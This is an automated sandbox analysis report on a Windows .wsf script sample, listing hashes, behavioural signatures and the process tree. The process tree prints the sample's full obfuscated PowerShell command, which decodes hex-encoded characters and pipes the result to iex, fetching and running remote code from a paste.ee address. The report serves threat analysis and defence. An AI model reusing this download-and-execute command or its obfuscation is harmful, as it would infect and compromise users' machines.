Analysis
-
max time kernel
117s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
25-09-2024 01:27
Static task
static1
Behavioral task
behavioral1
Sample
31b128f2442aa4c58503cb299f8ecf391119a3104aef762537061182c95537ad.wsf
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
31b128f2442aa4c58503cb299f8ecf391119a3104aef762537061182c95537ad.wsf
Resource
win10v2004-20240802-en
General
-
Target
31b128f2442aa4c58503cb299f8ecf391119a3104aef762537061182c95537ad.wsf
-
Size
3KB
-
MD5
a1373c64ddc49fd6affb0438cfc8221f
-
SHA1
d3ae82986edcbb76a81bfe8db65ed41a59624ec1
-
SHA256
31b128f2442aa4c58503cb299f8ecf391119a3104aef762537061182c95537ad
-
SHA512
e67352eba46223b8497bb4e1d029c8c06542b8491dde978ca10b009529e7fa37298e8c5bcf6e02769f2dd7857df61c404a51c9f8e06c99e8e24c53c418c97b48
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2784 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2784 powershell.exe 2700 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2784 powershell.exe Token: SeDebugPrivilege 2700 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2644 wrote to memory of 2784 2644 WScript.exe 30 PID 2644 wrote to memory of 2784 2644 WScript.exe 30 PID 2644 wrote to memory of 2784 2644 WScript.exe 30 PID 2784 wrote to memory of 2700 2784 powershell.exe 32 PID 2784 wrote to memory of 2700 2784 powershell.exe 32 PID 2784 wrote to memory of 2700 2784 powershell.exe 32
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31b128f2442aa4c58503cb299f8ecf391119a3104aef762537061182c95537ad.wsf"1⤵
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = ((24, 52,'3d',27, 49, 65 , 58 ,28, '4e' ,65, 27 ,'3b' , 24, 52,45 ,20 , '3d' , 20 ,24,52 ,'2b',27,57 , '2d','4f' , 42 , '4a', 27 , '3b' , 24 , 52, 45,44 , 20 , '3d',20, 24 , 52, 45 ,'2b' , 27, 65 , 43 ,54 , 20,'4e',65 ,54 , '2e' ,57, 27 ,'3b',24 ,50, 41,43,'3d',27, 65 , 42,43, '4c' , 27 , '3b', 24 ,78 ,78, 20,'3d' ,20,24, 50,41,43,'2b', 27, 49, 65, '4e' , 27, '3b',24, 52, '4f',20, '3d' ,20 ,24,78, 78, '2b' , 27 ,54 , 29 ,'2e',44 ,'4f', 57, '4e' , '4c' ,'4f' ,27,'3b' ,24 , '7a','7a' , '3d' , 27 , '4f',40,30,28,26,28 , 27 , 27 ,68 , 74,74, 70 ,73,'3a','2f','2f',70, 61,73,74, 65, '2e' ,65, 65 , '2f' , 72 ,'2f', 74 ,75,47 , 33 , 72 ,'2f' , 30 ,27, 27,29 ,27,'2e',52,65 , 50, '4c' , 41 , 43 ,65,28 , 27 ,'4f',40 , 30 , 28, 26,27, '2c' , 27 ,41,44,53,54, 52 ,49 , '4e',47 ,27,29 ,'3b' ,69,65 , 78, 28 , 24, 52 , 45 , 44,'2b' , 24, 52,'4f' ,'2b',24, '7a','7a', 29 ) | % { ( [cHar]([CONVeRT]::TOint16(( [strinG]$_ ) ,16))) })-jOIN'' |&( $env:cOmspeC[4,15,25]-jOIN'') ; powershell $ReDrO"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5afef18a0d6675009608de7727b22b431
SHA13cadc882af1f9c51463e27f64001150878ebf024
SHA2563c8d785034e937d0b022edea0bac0c4ddde8bae0029e2b989805fb80e3c94f98
SHA5125201e02ad541990e3e1842956291c04f13b06f1e15db682a1b4504b55a6515a00d5df63f873060a774b1358ae208f9dfaa7b64f905ce771bb06de399db15f1d0